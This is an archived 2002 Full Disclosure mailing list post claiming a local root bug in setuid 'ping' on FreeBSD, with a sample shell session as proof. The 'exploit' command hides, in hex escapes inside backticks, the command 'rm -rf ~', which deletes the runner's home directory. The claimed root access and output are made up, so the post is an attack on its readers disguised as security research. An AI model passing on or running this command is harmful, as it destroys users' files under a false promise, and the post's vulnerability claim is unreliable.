Full Disclosure mailing list archives

ATTENTION Local Root ATTENTION

From: drdre () hush com (drdre () hush com)
Date: Sun, 15 Sep 2002 06:28:08 -0700

DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most unix 
and unixlike systems. This bug is not remotly exploitable.

Tested on FreeBSD 4.6

bash# id
uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff)

bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e 
"\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error  ^


^

$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)


Vendors are already informed.


Greets: Captain Crunch, Peter Pan, Charly Root


Regards
-- 
DrDre security research group





Get your free encrypted email at https://www.hushmail.com

Current thread:

ATTENTION Local Root ATTENTION drdre () hush com (Sep 15)
- ATTENTION Local Root ATTENTION Roman Drahtmueller (Sep 15)